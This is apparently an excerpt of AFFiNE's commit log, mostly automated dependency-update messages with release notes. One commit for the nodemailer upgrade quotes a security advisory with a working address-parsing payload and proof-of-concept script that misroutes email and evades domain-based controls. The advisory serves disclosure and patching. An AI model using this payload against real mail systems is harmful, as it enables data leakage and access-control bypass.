[`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0) ##### 💣 Breaking Changes - Removes support for CommonJS - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()` - Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### 🎨 Features - Adds a new package called `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer) - Adds support for `import.meta` to the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the CSS pseudo selector `:scope` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) - Improves support for `MediaList` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Improves debug information in the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds validation of browser settings when creating a new `Browser` instance - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides with a declarative and simple way to add request headers - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Use local file paths for virtual server files in stack traces - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### :construction\_worker\_man: Patch fixes - Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
bf72833f05 |
chore: bump up nodemailer version to v7.0.7 [SECURITY] (#13704)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/)
([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.3`
-> `7.0.7`](https://renovatebot.com/diffs/npm/nodemailer/7.0.3/7.0.7) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[GHSA-mm7p-fcc7-pg87](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87)
The email parsing library incorrectly handles quoted local-parts
containing @​. This leads to misrouting of email recipients, where
the parser extracts and routes to an unintended domain instead of the
RFC-compliant target.
Payload: `"xclow3n@gmail.com x"@​internal.domain`
Using the following code to send mail
```
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
service: "gmail",
auth: {
user: "",
pass: "",
},
});
let mailOptions = {
from: '"Test Sender" <your_email@gmail.com>',
to: "\"xclow3n@gmail.com x\"@​internal.domain",
subject: "Hello from Nodemailer",
text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};
transporter.sendMail(mailOptions, (error, info) => {
if (error) {
return console.log("Error: ", error);
}
console.log("Message sent: %s", info.messageId);
});
(async () => {
const parser = await import("@​sparser/email-address-parser");
const { EmailAddress, ParsingOptions } = parser.default;
const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);
if (!parsed) {
console.error("Invalid email address:", mailOptions.to);
return;
}
console.log("Parsed email:", {
address: `${parsed.localPart}@​${parsed.domain}`,
local: parsed.localPart,
domain: parsed.domain,
});
})();
```
Running the script and seeing how this mail is parsed according to RFC
```
Parsed email: {
address: '"xclow3n@gmail.com x"@​internal.domain',
local: '"xclow3n@gmail.com x"',
domain: 'internal.domain'
}
```
But the email is sent to `xclow3n@gmail.com`
<img width="2128" height="439" alt="Image"
src="https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d"
/>
### Impact:
- Misdelivery / Data leakage: Email is sent to psres.net instead of
test.com.
- Filter evasion: Logs and anti-spam systems may be bypassed by hiding
recipients inside quoted local-parts.
- Potential compliance issue: Violates RFC 5321/5322 parsing rules.
- Domain based access control bypass in downstream applications using
your library to send mails
### Recommendations
- Fix parser to correctly treat quoted local-parts per RFC 5321/5322.
- Add strict validation rejecting local-parts containing embedded
@​ unless fully compliant with quoting.
---
### Release Notes
<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>
###
[`v7.0.7`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#707-2025-10-05)
[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.6...v7.0.7)
##### Bug Fixes
- **addressparser:** Fixed addressparser handling of quoted nested email
addresses
([1150d99](https://redirect.github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626))
- **dns:** add memory leak prevention for DNS cache
([0240d67](https://redirect.github.com/nodemailer/nodemailer/commit/0240d6795ded6d8008d102161a729f120b6d786a))
- **linter:** Updated eslint and created prettier formatting task
([df13b74](https://redirect.github.com/nodemailer/nodemailer/commit/df13b7487e368acded35e45d0887d23c89c9177a))
- refresh expired DNS cache on error
([#​1759](https://redirect.github.com/nodemailer/nodemailer/issues/1759))
([ea0fc5a](https://redirect.github.com/nodemailer/nodemailer/commit/ea0fc5a6633a3546f4b00fcf2f428e9ca732cdb6))
- resolve linter errors in DNS cache tests
([3b8982c](https://redirect.github.com/nodemailer/nodemailer/commit/3b8982c1f24508089a8757b74039000a4498b158))
###
[`v7.0.6`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#706-2025-08-27)
[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.5...v7.0.6)
##### Bug Fixes
- **encoder:** avoid silent data loss by properly flushing trailing
base64
([#​1747](https://redirect.github.com/nodemailer/nodemailer/issues/1747))
([01ae76f](https://redirect.github.com/nodemailer/nodemailer/commit/01ae76f2cfe991c0c3fe80170f236da60531496b))
- handle multiple XOAUTH2 token requests correctly
([#​1754](https://redirect.github.com/nodemailer/nodemailer/issues/1754))
([dbe0028](https://redirect.github.com/nodemailer/nodemailer/commit/dbe00286351cddf012726a41a96ae613d30a34ee))
- ReDoS vulnerability in parseDataURI and \_processDataUrl
([#​1755](https://redirect.github.com/nodemailer/nodemailer/issues/1755))
([90b3e24](https://redirect.github.com/nodemailer/nodemailer/commit/90b3e24d23929ebf9f4e16261049b40ee4055a39))
###
[`v7.0.5`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#705-2025-07-07)
[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.4...v7.0.5)
##### Bug Fixes
- updated well known delivery service list
([fa2724b](https://redirect.github.com/nodemailer/nodemailer/commit/fa2724b337eb8d8fdcdd788fe903980b061316b8))
###
[`v7.0.4`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#704-2025-06-29)
[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.3...v7.0.4)
##### Bug Fixes
- **pools:** Emit 'clear' once transporter is idle and all connections
are closed
([839e286](https://redirect.github.com/nodemailer/nodemailer/commit/839e28634c9a93ae4321f399a8c893bf487a09fa))
- **smtp-connection:** jsdoc public annotation for socket
([#​1741](https://redirect.github.com/nodemailer/nodemailer/issues/1741))
([c45c84f](https://redirect.github.com/nodemailer/nodemailer/commit/c45c84fe9b8e2ec5e0615ab02d4197473911ab3e))
- **well-known-services:** Added AliyunQiye
([
|
||
|
|
4b3ebd899b |
feat(ios): update js subscription api (#13678)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Added on-demand subscription refresh and state retrieval in the iOS app, enabling up-to-date subscription status and billing information. - Exposed lightweight runtime APIs to check and update subscription state for improved account visibility. - Chores - Integrated shared GraphQL package and project references to support subscription operations. - Updated workspace configuration to include the common GraphQL module for the iOS app. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
8006812bc0 |
refactor(editor): new icon picker (#13658)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * In-tree icon picker for Callout blocks (emoji, app icons, images) with popup UI and editor-wide extension/service. * Callout toolbar adds background color presets, an icon-picker action, and a destructive Delete action. * **Refactor** * Replaced legacy emoji workflow with icon-based rendering, updated state, styling, and lifecycle for callouts. * **Tests** * Updated callout E2E to reflect new default icon and picker behavior. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: L-Sun <zover.v@gmail.com> |
||
|
|
e7f76c1737 |
chore: update mermaid (#13510)
https://github.com/toeverything/AFFiNE/issues/13509 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded Mermaid dependency to v11.1.0 in the frontend core package. * **Impact** * Improved diagram rendering and compatibility with newer Mermaid syntax. * Potential performance and security improvements from upstream updates. * No UI changes expected; existing diagrams should continue to work. * Please verify critical diagram views for any rendering differences. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: L-Sun <zover.v@gmail.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
bf87178c26 |
chore: bump up @googleapis/androidpublisher version to v31 (#13633)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client) | [`^28.0.0` -> `^31.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/28.0.1/31.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>googleapis/google-api-nodejs-client (@​googleapis/androidpublisher)</summary> ### [`v31.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13100-2024-01-05) [Compare Source](https://redirect.github.com/googleapis/google-api-nodejs-client/compare/v30.0.0...v31.0.0) ##### ⚠ BREAKING CHANGES - **serviceconsumermanagement:** This release has breaking changes. - **playintegrity:** This release has breaking changes. ##### Features - **chromepolicy:** update the API ([8429e3c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8429e3c9d69b2b2e02b4b5e4556f0b0b53a27663)) - **chromeuxreport:** update the API ([6d52abb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d52abb90222775fa364da0903229c4b56d6c72e)) - **customsearch:** update the API ([1169e4c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1169e4c6072c5838d6a746210367e094cf65e9d2)) - **dialogflow:** update the API ([4b1e073](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b1e0734d9ae8775a64c0cf438cd3f657a2066b4)) - **displayvideo:** update the API ([45b61b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/45b61b5d20396610af050b54d84e7749467d5a30)) - **oslogin:** update the API ([cfc90e7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cfc90e7c9c9a3598ce397a40b6d5996b134bf1cf)) - **playintegrity:** update the API ([767af5f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/767af5f12e2f9e882df86428449d1a98e0e960a7)) - regenerate index files ([4246fd1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4246fd1c6484dac0d636d48a2dfcbfcbb2668702)) - **serviceconsumermanagement:** update the API ([a68206a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a68206a2112e645b0b5f521b38c2c068d7ba2375)) ##### Bug Fixes - **accesscontextmanager:** update the API ([845c716](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/845c7168e95499c0142a5cf4c368cb6144729019)) - **admin:** update the API ([4664d6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4664d6bb4c2fbf2751ae3e403359749fe960fc7a)) - **backupdr:** update the API ([19b0192](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/19b019219b696491ea603a8557212b4eee5535c4)) - **calendar:** update the API ([0ca9bbc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0ca9bbc4e4f841c163458e51952cc92d1363f578)) - **cloudbuild:** update the API ([31158a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31158a226c1d47bedfd330c25d376a6d48f09b40)) - **cloudidentity:** update the API ([22610b3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/22610b3d15ec8f639ae77785d76e890be521c98f)) - **cloudprofiler:** update the API ([2c5cbc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2c5cbc4299ab26894388427dbcd837e48f05a43b)) - **cloudtrace:** update the API ([2a811d5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a811d5fe82adc2795ce7015e5eeae258b11458d)) - **iap:** update the API ([ec596c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec596c1b8719938469a31030108b321c8aeb09cc)) - **playdeveloperreporting:** update the API ([7181840](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7181840daf9fd92d06a70b7cb64e45ce9b39671c)) - **servicenetworking:** update the API ([50c7dbd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c7dbd3231feefdabe77ff8a25f4d66b9b92a3a)) - **spanner:** update the API ([0e40d67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e40d674369b7cc93147e1f97186ca7063eeb770)) ### [`v30.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13000-2024-01-03) ##### ⚠ BREAKING CHANGES - **networksecurity:** This release has breaking changes. - **metastore:** This release has breaking changes. - **gmail:** This release has breaking changes. - **gkehub:** This release has breaking changes. - **drivelabels:** This release has breaking changes. - **dialogflow:** This release has breaking changes. - **datacatalog:** This release has breaking changes. - **content:** This release has breaking changes. - **connectors:** This release has breaking changes. - **cloudbuild:** This release has breaking changes. - **chat:** This release has breaking changes. - **batch:** This release has breaking changes. - **artifactregistry:** This release has breaking changes. - **aiplatform:** This release has breaking changes. - **advisorynotifications:** This release has breaking changes. ##### Features - **accesscontextmanager:** update the API ([26d496e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/26d496e4160db1e7d997333960be8254ff56ea4c)) - **adexchangebuyer2:** update the API ([31c0066](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31c006606f81a64eb95ec32a82227d9ff4472e79)) - **admin:** update the API ([79ce913](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/79ce9133d7a898632c1061a23575f8a3309b5e10)) - **advisorynotifications:** update the API ([0f44091](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0f440919dd1046ca5d0ea86233513958eed59602)) - **aiplatform:** update the API ([66739ce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/66739ce6244a9936791970333a30eabe9ea379f6)) - **alloydb:** update the API ([590f835](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/590f835773fe627a43a2f76aaa929260fd69955a)) - **analyticsdata:** update the API ([25d0b67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25d0b6763ee7fc4bd9e41cd00d11b5910ab2b274)) - **analyticshub:** update the API ([8279edf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8279edf154450c9994d306fc1b9eb423f18ed7a5)) - **androidpublisher:** update the API ([c6d69a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6d69a049d2227ed20fd292c6b6463adcef31d66)) - **artifactregistry:** update the API ([6fda22c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6fda22c4875bb65a8d3aaca4bf3b8a0a5beec127)) - **assuredworkloads:** update the API ([41debeb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41debeba5989a6a45043e2249fb02a869f3320bf)) - **backupdr:** update the API ([1018945](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10189457700ffa9745f4261a3953f21f3e8e12ac)) - **batch:** update the API ([9ef21e0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9ef21e04593fc74206167811071c92c5c033a728)) - **bigquery:** update the API ([f1deeab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f1deeabbb09f97c56c14a419c24cee371be992ec)) - **blockchainnodeengine:** update the API ([07ac2e7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07ac2e721d6d2ce87bccc4971423ba0af294d0b1)) - **chat:** update the API ([88428f0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88428f0d91d6836e07278b399a995c03d88992c8)) - **checks:** update the API ([2d78a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d78a72c71aadc4e1d796df157a759d171618d74)) - **cloudbilling:** update the API ([857a51e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/857a51e47b42f642555ff5ade0e8a39c55059e6e)) - **cloudbuild:** update the API ([ddf4c10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddf4c10cf4daa732358d589035a1d442f1883da4)) - **cloudchannel:** update the API ([aecac6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aecac6be45a12e632acffbdffe530945847ef721)) - **clouddeploy:** update the API ([62d7fd6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/62d7fd607039bc8d95a46d36845dbef6d2657219)) - **cloudfunctions:** update the API ([c5aae9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c5aae9a7cf970ac973a93d367bfe6bb44af95450)) - **cloudprofiler:** update the API ([2933bff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2933bff415c872da86b92b6c128a968530c6bfac)) - **cloudsupport:** update the API ([feb88b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/feb88b5521c4822859f14ccc9217d53347b560ed)) - **composer:** update the API ([53b83d6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/53b83d65b11d54b80aa94f8efaf09e27eace3beb)) - **compute:** update the API ([ffbf00b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ffbf00b1c1dfa03616f3900be03014f20f04c65e)) - **connectors:** update the API ([f433bd6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f433bd628431cd6c340746a6066b55bf27267e42)) - **container:** update the API ([cac432f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cac432f882b47acbeaeabd02a18c15d34160a589)) - **content:** update the API ([c0dd4c0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c0dd4c0bc2398f077f3b9a00dcacffa2052f4f38)) - **datacatalog:** update the API ([a939d7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a939d7eaf290e763657eda597be699c0f52d8773)) - **dataflow:** update the API ([9721cda](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9721cda955b70096a509f7d8984b317ef5ba1a1d)) - **dataform:** update the API ([d2bfeab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2bfeabcbe373953ea36424bfaa99d397a24bcd8)) - **datafusion:** update the API ([413c94e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c94e5db50bf95084b1991538cad71b0327a04)) - **dataplex:** update the API ([8da4b12](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8da4b128b1cfbcfd5998f0756e4bc7c3c0c4974e)) - **dataproc:** update the API ([5a60626](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a606262b3b48769b8c398f4fc306355a4b58373)) - **dialogflow:** update the API ([8829da4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8829da4a7ee2885ae8b580eed903b2df5526918f)) - **discoveryengine:** update the API ([567c02d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/567c02d28804729e8891e389f51e64cc6ea3baec)) - **dlp:** update the API ([7cbdc6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbdc6aaf4cf23b80085765599259cca5ed28db1)) - **dns:** update the API ([f783244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7832440a542bb2699b09e33c618670b88cfc73d)) - **documentai:** update the API ([01cc7b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/01cc7b599452a3ba52629add7fad7a6a6591ccd9)) - **drivelabels:** update the API ([50a1b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50a1b75751fca09b4e3cc7f58595954ac8c1d85a)) - **drive:** update the API ([c07f193](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c07f193c33f352bf778c6ed68e992fd9c2123abf)) - **file:** update the API ([324d0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/324d0f69b3c3a30200484b2e8fadf4833f804b23)) - **firebaseappcheck:** update the API ([c8fb050](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8fb050246b60f72597a9f55708b976daf1ae1e6)) - **firebaserules:** update the API ([2a44570](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a445705f00f8b85a0f7717cd4707c7308953e0a)) - **gkehub:** update the API ([044e086](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/044e0861eda69fa5426aef8643134da2e3510a3c)) - **gkeonprem:** update the API ([6c9398e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6c9398e54ec4e75eb22c58420c81b32880f2b365)) - **gmail:** update the API ([c7698bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7698bda1d9a8a034d92a63c27d9af74a416d94b)) - **healthcare:** update the API ([d34ee61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34ee618f97d95f61de528f9ada2100a0ba22643)) - **metastore:** update the API ([6887f67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6887f67506173992f1a6c4df2d5768ca472228a8)) - **migrationcenter:** update the API ([e890439](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e890439ac66117aff0b2edeb7b5dcd20c85b6ead)) - **monitoring:** update the API ([738848d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/738848dcb633a866afd62c42ab749479803906a7)) - **networkmanagement:** update the API ([d8a3556](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d8a35563fc89983bd90576aa84e4c0d8af3b4c5d)) - **networksecurity:** update the API ([166232f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/166232fe1444a4db2eb17f14b12ce85e87fceac8)) - **networkservices:** update the API ([076de17](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/076de17ce5a6588459729c00d6f8fd2de91a9d0c)) - **notebooks:** update the API ([a08d104](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a08d10480099cf544c56c0c4223dd94dfc5632f7)) - **orgpolicy:** update the API ([5c8f8c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c8f8c727ca5726b9e833698324eaa36aff29a2b)) - **oslogin:** update the API ([f1475c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f1475c544fad3f6694f35de1b21fb807f1b71368)) - **paymentsresellersubscription:** update the API ([d79cf5a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d79cf5a6cf6cf1dc2e0fc17f5e376955afafee5b)) - **playdeveloperreporting:** update the API ([6ef5718](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef5718e6efba2a56f586fb867d503c958004aaa)) - **policysimulator:** update the API ([58e6545](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58e654547c4e8f654e38c03aa3404e1f46254126)) - **prod\_tt\_sasportal:** update the API ([99b92fe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99b92fe5d94f364f22a9162d85cc4c47548366f2)) - **pubsub:** update the API ([f17fac3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f17fac34c01770a83a0dbb75aa2b061bb6b5e488)) - **recaptchaenterprise:** update the API ([7952baa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7952baabbe0e7b268591cb1b5f4e0ad063a53100)) - **recommender:** update the API ([76b9501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76b950132771df9ecd733ef8e535a910c8826cc3)) - **redis:** update the API ([fd4636b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fd4636b1c992ccd668708b55821fa1696231b9b2)) - regenerate index files ([33f2d78](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33f2d78b2c61a07023d7289278c78130d8e3c7e5)) - **retail:** update the API ([0aa095b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0aa095b51a4ee7be3dde61b0a8653f526f3e73ea)) - **run:** update the API ([48a19bf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48a19bf416bb1648a07e7efc4443d5202f6b8be1)) - **sasportal:** update the API ([2459cce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2459cce1e414ac32977316426351423ef6d23775)) - **script:** update the API ([0520e5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0520e5efd59cf7fdfcd2c0ba68962c95f194178d)) - **securitycenter:** update the API ([74c634a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c634a34ab01195b5e86f8034c977af13a9fa69)) - **serviceconsumermanagement:** update the API ([0552119](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05521190feb8bada97478dbbfbe617b3d2060080)) - **servicemanagement:** update the API ([429940b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/429940b1b4955ea05962454ff4132f5fa93cc83d)) - **servicenetworking:** update the API 